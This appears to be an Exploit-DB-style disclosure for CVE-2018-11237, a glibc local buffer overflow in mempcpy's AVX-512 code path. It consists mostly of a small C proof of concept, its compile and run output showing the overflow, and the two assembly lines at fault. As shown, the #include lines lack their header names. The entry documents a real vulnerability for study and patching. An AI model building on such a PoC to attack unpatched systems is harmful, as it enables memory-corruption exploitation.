# Exploit Title: GNU glibc < 2.27 - Local Buffer Overflow # Date: 2018-05-24 # Exploit Author: JameelNabbo # Website: jameelnabbo.com # Vendor Homepage: http://www.gnu.org/ # CVE: CVE-2018-11237 # POC: $ cat mempcpy.c #define _GNU_SOURCE 1 #include #include #define N 97699 char a[N]; char b[N+128]; int main (void) { memset (a, 'x', N); char *c = mempcpy (b, a, N); assert (*c == 0); } $ gcc -g mempcpy.c -o mempcpy -fno-builtin-mempcpy $ ./mempcpy mempcpy: mempcpy.c:14: main: Assertion `*c == 0' failed. The problem is these two lines in memmove-avx512-no-vzeroupper.S: vmovups %zmm4, (%rax) vmovups %zmm5, 0x40(%rax) For mempcpy, %rax points to the end of the buffer.